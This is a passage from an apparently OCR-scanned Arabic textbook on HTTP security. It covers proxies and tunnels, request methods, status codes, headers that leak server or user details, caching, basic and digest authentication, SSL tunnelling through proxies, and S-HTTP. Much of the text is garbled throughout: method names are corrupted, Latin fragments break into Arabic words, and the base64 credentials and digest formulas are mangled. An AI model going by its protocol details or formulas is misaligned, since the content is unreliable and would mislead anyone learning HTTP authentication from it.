المتواسل . والاشارات لفتح أو غلق توصيل تنفذ خلال حقل رأس التوصيل (الربط) . 
الوصلات المتواصلة ذات LA‏ من حيث الأمن » فإذا استعمل HTTP‏ عبر TLS‏ 
أو SSL‏ » فادورة أمية واحدة تناقش خلال ربط كل متواصل » ولزوج استجابة طلب 
" واحد (والذى سيعنى فوقى Les del‏ لاضافة أمن) HTTP.‏ يستعمل URIs‏ ليبين 
المورد الذى تطبق عليه طريقة محددة فى طلب . مشروع URI‏ الافتراضی هو (http?‏ 
وكا فى شكل ( - »)١‏ يستعمل HTTP‏ للاتصالات . بين وكيل شبكة Web)‏ 
(dient‏ [يشار إليه ULA‏ كوكيل المستخدم ] ووكالة شبكة أو pale‏ شبكة Web)‏ 
(server‏ عموماً HTTP pol e‏ قد يعمل كخادم أصل + AAA‏ 
مورد المعلومة يمكن استرجاعه من خادم الأصل (أى الخادم الذى يقيم فيه . الوكالة 
يمكنها ما أن تخدم طلب ذاته » أو توجهه بالانابة عن وكيل لخادم اخر . فمثلا » 


الا 





الوكيل يمكنه أن يطلب وثيقة والتى اختزنتها وكالة فى ذاكرتها المؤقتة والمشاركة (خزن 
(de‏ سابقاً . وإذا كانت الوثيقة حديثة وخادم الأصل يسمح للوكالة OL‏ ترسله لوكلاء 
» فان الوكالة ستخدم طلب الوكيل من الذاكرة المؤقتة . بهذه الطريقة » يمكن الوصول 
لأداء أفضل » ويمكن أن تقل حركة الشبكة . وكيل المستعمل أى المتصفح أو المحدد. 
أو العنكبوت [Spider]‏ أو ol‏ أداة أخرى للمستخدم يمكنه Lal‏ إختزان الوثائق 
المسترجعة فى ذاكرة مؤقتة (Cache) ¿Sos‏ . ولكن هذه الذاكرة المؤقتة لا يتم المشاركة 
فيها . والتمييز بين الذاكرات المؤقتة المشارك فیها والغير مشارك فيها هام لأسباب أمنية . 
فمثلا « إذا كان مطلوباً توثيق مستخدم للحصول على وثيقة محددة » فان تلك الوثيقة 
يجب ألا تکون ختزنة فى ذاكرة موقتة مشارك فیها . وإلا ۰ يجب أن یکون مستخدم 
التوثيق قادرا على ا حصول على الوثيقة من الوکالة . الوكالة شفافة إذا لم تعدل الطلبات 
أو الاستجابات » أو غير شفافة إذا فعلت ذلك لاعطاء بعض الخدمة الاضافية (مثل 
أغفال ). الوكيل ملم أنه يتصل بوكيل . ويمكن للمستخدم أن يحدد خادم وكالة فى 
أداءات المتصفح . وهذه الخاصية تم تقديمها لتعمل مع MAA‏ » ولكنها مفيدة 
ile Lal‏ الخصوصية . عندما يعمل وكيل طلبات من متصفح Web‏ خلال وكالة » 
فان Web pal‏ يرى Lb‏ فقط من الوكالة . 

وعلى عكس الوكالات» فإن الممرات (gateways)‏ شفاقة dole‏ للوكلاء (Clients)‏ . 
الممر عادة هو وسيط لخادم اخر يعمل كطبقة وظيفية فوق الخادم . فقد محفظ ذاكرة 
مؤقتة (Cache)‏ . وإذا كان ضرورياء فإن poll‏ يترجم الطلبات لبروتوكول الخادم 
الاساسی (مثل LDAP‏ للوصول لدليل أو WAP‏ للوصول لشبكة التليفون المحمول) . 

الأنبوبة (tunnel)‏ هى ريلاى أعمى » وليس من الضرورى أن تحفظ ذاكرة مؤقتة . 
ويمكن Ul ated‏ عندما تحتاج وصلة أن تتم خلال وسيط (مثل حماية (Firewall)‏ « 
حتى إذا كان الوسيط لا يمكنه أن يفهم محتويات الرسائل المتبادلة . 

: HTTP رسائل‎ 

رسائل HTTP‏ تحتوى على طلبات مرسلة من وكلاء لخادمين e‏ واستجابات مرسلة 


YY 


من خادمين لوكلاء . عموماً » تحتوى رسالة Ll HTTP‏ بدء (Start line)‏ « وصفر 
(zero)‏ أو رؤوس (headers)‏ وجسم رسالة (message body)‏ خيارى . والرأس 
Ses‏ دائياً على سم حقل (field name)‏ « ونقطتين على بعضه| (: (Colon‏ وقيمة 
vex . From : somebody @ something. com | «(field value) Jal‏ 
حقول الرأس عامة» (مثل «أى التاريخ) ۰ والبعض يمكن استعماله فى طلب فقط 
«(Form |)‏ آو فى استجابة (Server, o) bts‏ أى خادم» وبعض Jatt‏ تستعمل 
لوصف کینونات ف جسم الرسالة (مثل Content - Encoding‏ ( . وحقل ob‏ 
كينونة ¿nr Content - Type‏ نوع الوسائط الجسم الكينونة الرسل للوکیل (مثل/ text‏ 
image / gif html‏ آو (aplication / pdf‏ . 
خط البدء لطلب HTTP‏ یشار إليه كطلب «(request line) dt‏ فهو محدد طلب 
الوكيل الحقيقى بتحديد URI ¿db‏ وإصدار HTTP‏ التی يستعملها الوكيل 
CHTTP/L.1 JE)‏ والطرق التالية تعرف : 
OPTIONS ©‏ : (خيارات) معلومات طلبات الوكيل فقط عن خيارات أو 
الاحتياجات الصاحبة للمورد المحدد بواسطة e URI‏ أو من بعض القدرات 
للخادم : 
GETO‏ : نفس إستجابة طلبات الوكيل مثل ما لطريقة 0131 المحددة » ولكن بدون 
جسم الرسالة (هذا يمكن استعاله لاختبارات وصلات نص غير تتابعية للصحة ‏ 
والوصول ها والتعدیل gal,‏ 
od : POST @‏ الطريقة t‏ یمکن للوکیل ارسال بيانات ال جسم الرسالة) للخادم» 
URI‏ يحدد المورد الذى سيتناول الكيئونة الموجودة فى جسم الرسالة (هذا يمكن 
استعیاله JLN‏ رسالة لمجموعة الاخبار (newsgroup)‏ أو توزيع شکل Web‏ . 
PUTO‏ : يحتاج الموكل للكينونة المحتواة فى جسم الرسالة ob‏ تخترن URICE‏ 
المحددة. 
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. URI يطلب الموكل أن الخادم الأصلى یلغی المورد المحدد بواسطة‎ : DELETE® 


TRACE ©‏ : يمكن للموکل استعال هذه التهيئة ما يتم استقباله عند الطرف الآخر 

لسلسلة الطلب lay‏ بیانات الاستجابة للاختبار . 
08 : هذه الطريقة یمکن استع اها بوكالة والتی یمکنها التقل ديناميكياً 

لتكون أنبوبة (tunnel)‏ . 

DELETE: PUT«BEAD «GET‏ ( وكذلك مثل (OPTIONS)‏ (خیارات)؛ 
وتتبع a&a(TRACB)‏ . 

هى طرق فعالة مثلها ) (idempotent‏ مما يعنى أن تأثيراتها LGW‏ (التى يولدها 
الخادم) ذات اثنين أو أكثر من الطلبات مماثلة كا هو لطلب واحد . فمثلاً > طلب 
قائمة الأسعار (GET)‏ لنتجات محددة عبر الشبكة (Web)‏ هی طريقة فعالة مثلها N‏ 
| حالة الخادم تظل كا هى » ولا يهم عدد المرات طلب العميل ويتسلم القائمة . 

من الناحية الأأحرى » فإن الدفع ليس عملية فعالة مثلها فإذا نفذت طريقة دفع على 
أساس موكل يخضع لشكل شبكة > فالتنفيذ يجب ألا يستعمل طريقة GET‏ » ولكن 
بطريقة POST‏ . علاوة على ذلك فان HEAD GET:‏ يجب أن تستعملا لاسترجاع 
المعلومات فقط» وبطريقة بحيث لا تتولد آثار جانبية بواسطة الخادم . بمعنى A‏ 
يجب أن يكون امن (Safe)‏ للموكلين لاستعمال هذه الطرق بدون أى نتائج (أى » عند 
تصفح حل شبكة (tweb shop)‏ . 

خط البدء لاستجابة HTTP‏ يسمى خط (Status line) JAI‏ »فهو محتوی de‏ 
اصدار HTTP‏ الستخدم بواسطة الخادم > وشفرة حالة Ales (status code)‏ سبب 
(reason phrase)‏ . شفرة الحالة عبارة عن عدد من ثلاثة آرقام مبينة نتيجة محاولة 
الخادم لتلبية طلب . dle‏ السبب هی وصف نصی قصير لشفرة الحالة . فمثلاً » إذا 
طلب موکل وثيقة والتی لا یمکن أن توجد على الخادم » فإن الخادم سیستجیب ب 
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J a وإذا وجدت الوثيقة » ولكن الموكل يجب أن‎ . 1404 Not Found» 
رفض الخادم أن لين‎ la] . 1401 Unauthorized) عليها » فان الخادم یستجیب‎ 
ويلاحظ أنه إذا كانت كلتا الوثيقة‎ )403 Forbidden) الاستجابة » فإنه سيستجيب ب‎ 





والعلومة عن وجودها شخصية » فيجب أن يستجيب atl‏ أيضاً ب Forbid-»‏ 403 
(den‏ . وإذا وجدت الوثيقة dy‏ تكن شخصية » فإن الخادم يستجيب ب OK‏ 200( 
ويتضمن الوثيقة فى جسم الرسالة للاستجابة . 

رؤوس تسرب معلومات حساسة : 

كل رؤوس HTTP‏ التى تحمل معلومات عن موكل أو خادم أصل (origin server)‏ 
هى مخاطرة أمن كبيرة . فمثلاً » فان رأس إستجابة الخادم يبين دورة برنامج الخادم 
LAN‏ (مثل ۰ 2.17 (CERN / 3.0 libwww/‏ والتى يمكن أن تجعل الخادم معرضاً 
للهجوم إذا كان إصدار البرنامج معروف عنه أن به فجوات أمنية . رؤوس The Accept,‏ 
تعطى أيضا معلومات إضافية عن الخادم language. media type to)‏ « فان 

يقة التشفير مقبولة بواسطة الخادم). طلب أو رأس الاستجابة يستعمل بواسطة 
متوسطات (proxies je)‏ لبيان البروتوكولات البينية والمتسلمين بين الموكل والخادم 
(طلب)» وبين الخادم الأصل والموكل (استجابة) . ويمكن أن يكون رأس مشكلة أمن 
ON‏ المعلومات عن المضيفات خلف الحاية قد توحى به إذا وضعت وكالة عند Ale‏ 
ومثل رأس الخادم » فان رس طلب مستخدم / وکیل يوحى باصدار برنامج الوكيل 
(مثل2.1703 / CERN - bne Model / 2.15/ libwww‏ (. راس طلب من From)‏ 
(request header‏ يحتوى على عنوان إنترنيت أو بريد الكترونى للمستخدم . ومن 
الواضح. أنه إذا فضل المستخدم أن يظل مغفول الاسم » يجب عدم إرسال هذا الرس 
فى الطلب» ويمكن استعمال رأس طلب مرجع بواسطة موكلين لتحديد URI‏ للوثيقة 
التى منها تم الحصول على طلب111811 . ويمكن للخادم استعالها لتحسين الاختزان 
المؤقت . المثال Y‏ لاستع‌اها هو لاختبار كفاءة إعلان موجود على صفحة Web‏ 
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حددة . ويمكن عمل ذلك بعد ste‏ المستخدمين الذين يطلبون المورد المشار إليه 
بالاعلان » حيث يحتوى الطلب على URI‏ صفحة Web‏ تلك التى فى رأس المرجع . 
ومعلومات الرأس تسمح للخادم ob‏ يلاحظ تصرف مستخدم وبالتالى ينتهك 
خصوصيته. بالاضافة لذلك» فان بعض المواقع تستعمل أشكال شبكة Web)‏ 
(Forms‏ تعمل بطريقة GET au ۰ GET‏ هو e URI‏ وبذلك فإن المعلومة الحساسة 
(مثل رقم بطاقة ائتمان)» محتواة فى URI‏ . وحتى إذا كان ربط مشفر (مثل : 
بواسطة URI op (SSL‏ الذى يحتوى على رقم بطاقة إئتمان يمكن الافصاح عنه خلال 
ob‏ المرجع (referer header)‏ بت خر » فان رس الرجع ليست مشفرة حتى إذا 
استعملت «SSL‏ لذلك فان أى رقم بطاقة اتتمان قد يحتوى عليه لن تكون له حماية . 
عموماً » إذا تم نقل الصفحة التالية باستعمال بروتوكول آمن » فيجب عدم تضمين رأس 
الرجع فى الطلب. والانتهاك الآخر للخصوصية قد يحدث إذا شفرت الة بحث 
(Search engine)‏ استفسار بحث داخل URI‏ لطريقة ۰0۳1 والتى لسوء الحظ هی 
الحالة غالباً . 

إصدارات آمن ذاكرة SGU HTTP‏ : 


الذاكرة المؤقتة (cache)‏ عبارة عن OF‏ محل يمكن انشاؤه وحفظه بواسطة موكل » 
أو وكالة أو مر . وکا هو معلوم » فهى تستعمل لاختزان استجابات من خادمات 
fel‏ حتى يتحسن الأداء وتقل حركة الشبكة . تحكم الذاكرة المؤقتة يمكن تنفيذه 
بتوجيهات تحكم ذاكرة مؤقتة فى رؤوس تحكم / الذاكرة المؤقتة إذا عرف مورد بخادم 
الأصل على أنه يتعامل مع الذاكرة المؤقتة (cachable)‏ ۰ فان نسخته یمکن ختزانها فى 
ذاكرة مؤقتة . وحتى فى تلك الحالة » قد توجد قيود إضافية عن كيفية استعیال نسخة 
مختزنة مؤقتاً فى ذاكرة ؛ وإذالم تكن هذه النسخة مختلفة عن الاستجابة التى يتم الحصول 
dale Ye‏ من خادم الأصل» فهى BUS jos‏ بتطوير semantically) BUN‏ 
(transparent‏ ومن الواضح إنه bl‏ كانت وثيقة تحتوى على معلومة يتم تحديثها Les‏ 
(مثل آخر OS‏ شفافية دلالة LWW‏ صحيحة فقط لفترة زمنية أقصر من فترة 
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التحديث . تاريخ إنتهاء صلاحية مورد يمكن تعريفه بواسطة خادم الأصل خلال 
رأس انتهاء الصلاحية (Expires header)‏ ۰ أو خلال اتجاهى أقصى عمر (- max‏ 
(age‏ لرأس تحكم / الذاكرة المؤقتة . وإذا كان pole‏ الأصل يريد وكالة أو مر 
لتصحيح إنعاش الوثيقة خلال كل طلب lia)‏ هام خاصة للخدمات الرفوعة التى 
تضمن إنعاش المعلومة) ويمكن أن يتضمن رأس تحكم / الذاكرة المؤقتة بتوجيهى يجب 
وكا هو معلوم > فان طريقة POST‏ ليست بالضرورة «(idenpotent)‏ ويمكن أن 
تسبب آثار جانبية عند خادم الأصل . فمثلاً » فإن استجابة فعالة مثلها الخادم قد 
تحتوى على إيصال دفع . ومن الواضح » أن تلك الاستجابات يجب ألا تختزن مؤقتاً OY‏ 
ليس لما قيمة للمستخدمن العتادین » وقد تؤدى لانتهاك حرمة الخصوصية . 
والنتيجة» أن الاستجابات ل POST‏ وكذلك للطرق الغير فعالة الأخرى لا تختزن 
ige‏ وإذا كان موكل يجب أن يعطى توكيل لاسترجاع وثيقة فإنه يتضمن رأس توكيل 
(Authorization header)‏ يحمل معلومة توثيق مستخدم (مثل كلمة سر ) فى 
الطلب . واستجابة لذلك الطلب يجب أن يتضمن اتجاهى الذاكرة المؤقتة الخاص فى 
رأس تحكم/ ذاكرة مؤقتة » وهذا يمنع اختزان فى ذاكرة مؤقتة مشارك فيها وإلا سيكون 
Y (directive)‏ يضمن أن وكالة غير أمينة تختزن مؤقتاً وتستعمل الوثيقة الخاصة . 
وحيث أن الوكالات (proxies)‏ لما وصول للملكيات الخاصة والمعلومات ذات 
الصلة بالأمن » فان الوكالة الغير أمينة ما فرص كثيرة للهجوم وانتهاكات الخصوصية . 
وإذا لم يكن ممكناً الوثوق فى وكالة فيجب معاملتها مثل الشبكة العامة . كذلك ¢ فان 
مضيفات الوكالات سيتم حمايتها بنفس الطريقة لمضيفات الأصل . 
توثيق موكل HTTP‏ : 
Jos HTTP‏ استجابة / تحدى بخيارين » آلية توثيق موكل مؤسسة على كلمة سس 


۷۷ 


وتوئیق آساسی وتوئیق غار + وهذه الآليات تعطى توثيق وصول La‏ . بمعنى آخر 4 
فهی لا تقدم حماية للرسائل التبادلة بعد ذلك . والاستثناء الوحید هو أن الية التوئیق 
الختارة قد تعطی توثیق jel‏ بیانات ضعیف وحماية تکامل محدودة خلال استعمال قیم 
فحص تکامل (gop = auth - inte MAC)‏ وانعاش رسائل خلال الاستعمال 
gop = auth - intes AUIS) sy‏ فقط ) . 
التوثيق الأساسى: 

{els‏ » فان خادم الأصل Ls, (Origin server)‏ تحدى (challenger‏ ۰ (ولكنه لا 
يمثل تحدى ریاضی) للموكل فی شكل استجابة HTTP‏ مع شفرة الحالة (Status‏ 
Unauthorized)code)‏ 401( (أى الغير موكلة) ومع : 

WWW - Authenticate header 
تحتوى على على قيمة تحدى واحد على الأقل . مثل‎ 
Client: 


GET http://www.some.org/pub/WWW/TheProject.html HTTP/1.1 
User-Agent: Mozilla/4.0D 


Server: 


HTTP/1.1 401 Unauthorized 
wWW-Authenticate: Basic realm= "Users" 


Client: 


GET http://www.some.org/pub/WWW/TheProject.html HTTP/1.1 
User-Agent: Mozilla/4.0 
Authorization: Basic QWxhZGRpbjpvcGVuIHNl c2F t2Q=— 


ومع توثيق أساسى 6 فان الستخدم یوثق نفسه باسم مستحدم وكلمة سر لمجال 
حدد. المجال (realm)‏ وأصل الخادم URI‏ يعرفان مكان الحاية (مثل دليل فرعى 
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بوصول لمجموعة مستخدم محددة) . ويمكن أن يكون للمستخدم زوج مختلف ID)‏ 
الستعمل وكلمة السر) لكل جال على خادم أو قد يصل لمجالات محددة فقط فمثلاً » 
خادم الأصل قد يرسل التحدى التالى : 


WWW-Authenticate: Basic realm="Sesame" 


حينئذ » فان الموكل يرسل طلب جديد يحتوى على الرأس التالى 


Auttorization: Basic QWxhZ6GRpbjpveGVuIHNLc2FtZ0= 


الصف (string)‏ الأحير يمثل أوراق اعتماد (أى12 ) المستخدم قاعدة 64 مشفرة 
وكلمة سر (علاء الدين : إفتح يا سمسم). ويلاحظ أن كلمة السر أرسلت فى 
الشفافية (clear)‏ وهی الضعف الأساسى TG‏ أمن التوثيق . ويجب Ural‏ على 
قناة امنة فقط . 
التوثيق المختصر : 
التوثيق الختصر (digest authentication)‏ يمكن استع‌اله Lal‏ لخادم / موكل » 
وخادم / وكالة وتوثيق وكالة / وكالة . والتحدى فى مشروع التوثيق اللخص هو قيمة 
عشوائية (أى (Jle‏ . وقيمة التحدى يجب أن تكون كانعاش کا تسمح إحتياجات 
آداء الخادم (من المضيعة للوقت فحص إنعاش الحاضر) حتى نمنع هجوم إعادة 
العرض . فمثلا » فإن وظيفة حالية قد تستعمل ختم الوقت » وعنوان 18 الموكل» 
URI;‏ المطلوب ومفتاح خادم كمتغيرات دخل . ويرسل التحدى فى استجابة باستعال 
رأس «www - Authenticate‏ والتی تتضمن أيضاً عدداً من الحقول تسمى إتجاهيات 
(directives)‏ فهى قد تبدو کا يل : 
WWH-Authenticate: Digest‏ ` 
realm="testrealmdhost.com",‏ 
gop="auth,auth-int",‏ 


nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", 
algorithm=MDb5 
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حقل خطوات الحل يبين وظيفة مزيج الشفرة والذى يجب أن يستعمله الموكل 
ساب التلخيص (digest)‏ . وحالیا » فان وظائف المزيج المدعم فقط هی افتراض 
MDS - -  ».5«‏ . حقل gog‏ الملخص (جودة الحاية) يبين نوع AAAI‏ المدعمة 
بواسطة نخادم : (auth‏ . هی التوثيق auth - int: (authentication)‏ للتوثيق los‏ 


تكامل . وكاستجابة لتحدث توثيق الخادم» والموكل يرسل طلب 1۲۲۴ يحتوى على 
ob‏ توكيل (authorization)‏ » مثل . 


Authorization: Digest 
username="Mufasa", 
realm="testrealmahost.com"”, 
nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093" 
uri="/dir/index.html", 
qop=auth, 
nc=00000001, 
cnonce="0a4f113b", 
response="6629ae49393a05397450978507c4ef1" 


قيمة حقل dle‏ المجال الحالى BUE‏ تلك التى فى رسالة تحدى . قيمة حقل FU uri‏ 
ذلك URI‏ المورد فى الطلب . والقيم مضمنة N‏ الوكالات قد تغير سطر الطلب فى 
العبور . قيمة gop‏ المختارة بواسطة الموكل يجب أن تكون واحدة من القيم المبينة بواسطة 
الخادم ( فى هذه الحالة فهى auth‏ للتوثيق . حقول client - nonce ] co--J‏ [ 
csinonce‏ الوکل الحالى » nonce count [ nc y‏ ] أى العد GUY‏ توجد فقط إذا كان 
الخادم تضمن > gop‏ فى رسالة التحدى . cnonce Ass‏ » وبالتالى استعال 
حقل (gop‏ يوصى به بقوة » حيث يمكنه عمل توثيق متبادل » وحماية تكامل رسالة 
وحماية ضد هجوم النصوص (plaintext)‏ السهلة . 

الموكل يحسب قيمة حقل طلب التوكيل (والذى هو فى الحقيقة الاستجابة لتحدى 
توثيق الخادم فى الطريقة المبسطة التالية 0 aho)‏ وظيفة مزیح مشفر ) . 


request-digest = / (secret, b (Al), nonce, nc, cnonce, qop, û (A2)) 


Al = username, realm, password (if MDS is used) 
Al = A (username. realm, password), nonce, cnonce (iE MD5-sess is used) 
AZ = “Digest”, uri {if gop = “auch”) 
A2 = “Digest”, uri, > (entiz-body) (if qop = “auth-int”) 


تستعمل هذه الطريقة عندما يكون حقل gop‏ موجود .1 » (جسم - الکینونة) يتم 
حسابه قبل استعمال تشغير نقل بواسطة المرسل . تضمين هذه القيمة يحمى تكامل 
ge‏ الرسالة (أى (HTTP‏ . فى معظم الحالات » فإن سرى = كلمة سر (أى 
أن سرى يتم إقتسامها بين الموكل والخادم) . ومع «MDS - ses‏ فان قيمة Al‏ تحسب 
مرة واحدة فقط ۰ بعد تبادل التوثيق الأول . وتستعمل نفس القيمة لتوئیق 
طلبات HTTP‏ التالية والاستجابات » ولذلك فهى تمثل نوع مفتاح دورة Session)‏ 
„(Key‏ ومن الواضح أن هذا یعطی حالة داخل dake stateless HTTP‏ بعد استقبال 
بيانات توثيق الموكل isl)‏ طلب توكيل الموكل)» فإن الخادم ينظر لكلمة السر التى تقابل 
إسم الستخدم. فهو يؤدى نفس عملية التلخيص لحساب ملخص/ طلب . والقيمة 
المحسوبة يجب أن تكون ماثلة لطلب التوكيل . وإلا » يجب رفض طلب الموكل . 

الخادم ينظر لكلمة السر التى تقابل إسم المستخدم . فهو يؤدى نفس عملية 
التلخيص ساب ملخص / طلب . والقيمة المحسوبة يجب أن تكون ممائلة لطلب 
التوكيل Vs‏ » يجب رفض طلب الموكل . 

الخادم قد يرسل إستجابة تحتوى على رأس معلومة توثيق authentication info)‏ 
Slav!) (nonce) du (header‏ حاضر جديد والذى يجب أن يستعمله الموكل 
لاستجابة توثيق مستقبلية . كذلك » يمكن إستعمال هذا الرأس لاعطاء توثيق متبادل 
ee)‏ أن الخادم gay‏ أنه يعلم سر الستخدم) وكذلك تعامل الرسالة (إذا كانت ممع 
auth - int‏ =( . الخادم يحسب اللخص المقابل بطريقة مشابهة : 
استخدام أنبوب SSL‏ : 


وكالة HTTP‏ عندما تريد توثيق موكل فإنها ترسل استجابة بشفرة حالة (status‏ 
code)‏ : 

Proxy Authentication Required‏ 3407 رأس Proxy Authenticate‏ عتوی 
على قيمة تحدى واحدة على الأقل . وهذه الطريقة يمكن استع‌ها 1 كانت وكالة 
(proxy)‏ موجودة عل مر الأمن فى VPN‏ . فى هذه الطريقة » فان الوكالة ستوجه 


AN 


طلبات HTTP‏ الواردة من الشبكة الداخلية للموكلين الموثقين فقط . ونفس الرؤوس 
يمكن استعالها إذا كانت وكالة أو خادم ee,‏ 


وإذا رغب الموكل عمل ربط من طرف لطرف لخادم الأصل فى هذا السيناريو , 
فيجب وجود طريقة ما بحيث يمكن SSL Las I‏ أن يمر من الوكالة » ولكن الموكل أن 
يوثق للوكالة . البروتوكول الانبوبی 851 المقترح ثم إفتراضه بواسطة متصفحى Web‏ 
كثيرين وخدام (Netscape CERN) Web‏ . ب الثال التالى» فان الموكل يوثق نفسه 
للوكالة» ولكن يعمل SSL)‏ طرف لطرف لخادم الاصل . والوكالة تلقائيا تضع 
. بیانات 551 فى الأنبوب . 


CONNECT home.some.com:443 HTTP/1:1 
User-agent: Mozilla/4.0 
SSL data... 


Proxy: 


HTTP/1.1 407 Proxy Authentication Required 
Proxy-Authenticate: Basic realm= "Users" 


«SSL data... 
Client: 
CONNECT home.some.com:443 HTTP/1.1 


User-Agent: Mozilla/4.0 
Proxy-Authorization: Basic QWxhZGRpbjpvcGVuIHNLc2FtZQ== 


...SSL data... 
فى هذه الطريقة » فإن اتلربط بين الموكل وخادم الأصل آمن والوكالة ليس لما‎ 
إمكانية وصول بيانات.551 . ونتيجة لذلك » فلا يحتاج أن يوثق به (أى أنه لا يعرف‎ 
. SSL تنفيذ‎ CLAY مفاتيح الشفرة الستعملة فى قطاع 551 . كذلك » فان الوكالة‎ 


HTTP ( HTTPS ووكالات هو تنفيذ وكالة‎ SSL للتعامل مع ربط‎ ESTRES] 
وتطبیقات أخرى . والربط من‎ FIPS هو‎ |S عند مر الأمن بطريقة مشايهة‎ (SSL مع‎ 
معتاد) . والوكالة تعمل ربط امن بالإنابة عن‎ HTTP) الموكل للوكالة غير مؤمن‎ 
. كلى ويجب أن يوثق به‎ SSLA ES الوكالة تحتاج‎ OL » الموكل . ومن الواضح‎ 
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أمن تعامل Web‏ : 

تحدد إحتياجات الأمن العامة التالية لرسائل SILL HTTP‏ واستجابات) كما يل : 

© توئیق bol‏ الرسالة 

© تكامل الرسالة 

© خصوصية الرسالة 

© إنعاش الرسالة 

خدمات أمن المعلومات المقابلة معروفة . والاحتياجات الإضافية هى أن خدمات 
HTTP yl‏ يجب أن تكون سهلة فى التعامل مع خواص HTTP‏ الأأحرى » ويجب أن 
تدعم الآليات المتعددة (مثل 6 جب أن تكون مستقلة عن الية الأمن) . 

‘ بدء (مبینا العطريقة الطلوبة)‎ bee fo تحتوی‎ HTTP هو معلوم 3 فإن رسالة‎ LS, 
وصفر وکینونات أكثر فى جسم الرسالة . وفى حالات كثيرة ؛‎ AST وصفر أو رژوس‎ 
یکفی حاية جسم الرسالة . وكا ذکرنا سابقاً » فان الرآس قد يحمل معلومات حساسة‎ 
e عنوان الاصل (مثل‎ glas فمثلاً » قد يكون ضرورياً منع‎ IA والتى تحتاج‎ Lal 
أو نع تسرب معلومات حساسة ولكن لازال يتضمن‎ «(From header „I, من‎ 
. للمورد الطلوب‎ URI o بدء‎ et cet e ll. الرژوس التی قد تکون حاصة‎ 
. الخاص به خاصة » فان خط البدء يجب أن یشفر‎ URI إذا كان وجود الورد‎ 

كما ذکر سابقاً » توثیق ملخص HTTP‏ یعطی توثیق bel‏ بیانات ضعيفة فقط e‏ 
وحماية تکامل محدود للکینونات فى جسم الرسالة وانماش الرسالة . خدمات الامن 
الأحرى قد تزود وما 


9 كبروتوكول أمن أساسى یعطی قناة آمنة ( یعطی قناة امنة (مثل 881 أو (TLS‏ 
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© كبروتوكول أمن مغلف يطبق على كينونات فى حجم رسالة HTTP‏ ( مثل » 

. (PGP و‎ /MITT 
. (PEP «S_HTTP کامتداد ل ۲۲۲۲۳( مثل‎ © 

وحل مؤسس على قناة آمنة يمكنه أساسًا أن يقدم كل خدمات آمن الرسالة المذكورة 
سابقًا » فيها عدا عدم الأنكار مع أنه على آساس de‏ ولیس لكل رسالة . وعدم 
الانكار (nonrepudiation)‏ مؤسس على توقيع رقمى والذى يطبق عادة لكينونات 
محددة فى جسم الرسالة وليس لفيض بيانات . . المشكلة الاضافية للقناة الامنة هى فى 
تناول الوسائط » خاصة الوكالات . وإذا تكونت قناة آمنة بطرف لطرف (أى بين موكل 
وخادم أصل ) » فليس من الممكن لوكالة عمل طلب الانابة عن الموكل لأنها لا 
يمكنها تغيير فيض البيانات الآمنة . والمميزات الأساسية لقناة آمنة هى lel‏ يمكن أن 
تضاف بشفافية ل ol) HTTP‏ الرسالة كلها يتم حمايتها cl)‏ سطر البدء والرژوس 
وجسم الرسالة ) SSL.‏ ينفذ فى معظم متصفحات Web‏ التجارية وخادمات Web‏ 
SSL-secured HTTP‏ تسمى S/MIME . PGP . HTTPS‏ مع أمثلة معروفة لنسق 
الرسالة المشفرة معروفة . 

وتلك الرسائل يمكن تبادها خلال رسائل HTTP‏ ككينونات فى جسم الرسالة . فى 
تلك الحالة » فان HTTP‏ يستعمل كبرتوكول نقل الرسائل ذات le‏ فعلاً . وكلا 
الخادم والموكل يجب أن يكونا قادرين على توليد وفهم النسق المقابل . وهذا الحل لا 
يقدم إمكانية حماية للدخول البدء أو الرؤوس . زيادة على ذلك » فإن الموكلين 
والخادمات يجب كليه) أن Le‏ نسق رسالة واحد مشفر مشترك على الأقل . وحيث 
أن هذه ليست ja‏ من الیروتوکول. فإن HTTP‏ لا يقدم آلية محادثات لآليات الأمن . 

لسوء الحظ » فإنه لا يوجد بروتوكول لزيادة آمن «S-HTTP‏ و PEP‏ . وميزتها 
الأساسية هى أن خدمات الأمن تفهم سياق حمل رسالة HTTP‏ ۰ بحيث من الممكن 
تنفيذ خدمات أمن ذات مكونات دقيقة . وهذه البروتوكولات تدعى توجيه الرسالة ‏ 
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بعکس ما لبروتوکولات توجیه القناة مثل SSL TLS‏ . بمعنی أخفر + فان بروتوكولات 
توجيه القناة تعمل عند طبقة النقل » le‏ بروتوکولات توجیه الرسالة هى امتداد 
آمن لتطبیق محدد . وبحلول توجیه الرسالة من المکن Bole‏ خیارات الامن عند 
مستوی HTTP‏ . 

: S-HTTP 


۲ هر بروتوکول إتصالات آمن بتوجیه رسالة مصمم للاستعمال مع HTTP‏ 
سباق tl‏ فى رسالته Ble‏ الذی فى HTTP‏ ۰ ولکن یستعمل جموعة MLE‏ من 
الرژوس . جسم الرسالة ذو حماية شفرية dale‏ . لحاية رسالة HTTP‏ كلها » متضمنة 
سطر البدء والرژوس وجسم الرسالة » فان HTTP‏ یعطی غطاء (wrapping)‏ ۰ أى آلية 
GE‏ . وبعض رژوس HTTP‏ يجب ترکها بدون حاية ( آی بدون غلاف ) ۰ UN‏ 
يجب أن تقرأ بواسطة أوساط والتی یمکنها قراءة بیانات مغلفة . ولأسباب الخصوصية» 
فإن سطر الطلب URI‏ يجب أن یکون Y) lo he‏ توضع URI‏ فى سطر الطلب UY‏ 
آرسلت فى ال Clear"‏ . وبالمثل » سطر (status line) JU‏ فى استجابة الخادم 
يجب ألا يبين أى شىء عن نجاح أو فشل لطلب HTTP‏ الغير مغلف e‏ ویعرف سياق 
الجملة (syntax)‏ لطمر متغيرات محادثات GS-HTTP‏ وائق HTML‏ . 51111۳ 
یمکن استع‌اله بانساق رسائل تشفير متعددة ‏ مثل MOSS » CMS‏ . الاختیار Ore‏ 
Jle a‏ خصوصية ‏ ثابت (Contact - Privacy - Domain header)‏ . 
۲ يمكنه أيضًا حاية أنواع أخرى من الرسائل . الرسالة يمكن أن توقع › 
وتوثق باستعمال (MAC‏ مشفرة أو جمع من هذه . 

آلية استجابة تحدى مؤسسة على أشياء حاضرة قد تستعمل لتأكيد انعاش الرسالة . 
أطراف الاتصالات قد يستعملون كلات سر » أو أسرار مشاركة ( مفاتيح متمائلة 
منظمة تمهيدًا ) أو مادة مفتاح عام . وإذا كانت الرسالة موقعة » يمكن GUA‏ شهادة 
ما . آلية حادثات خیارات S-HTTP‏ تؤسس على تبادل رژوس dele‏ . فمثلا » فان 
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سطر الرأس التالى يقول « نت حر فى أن تستعمل DES - CBC‏ أو its) RC2‏ 


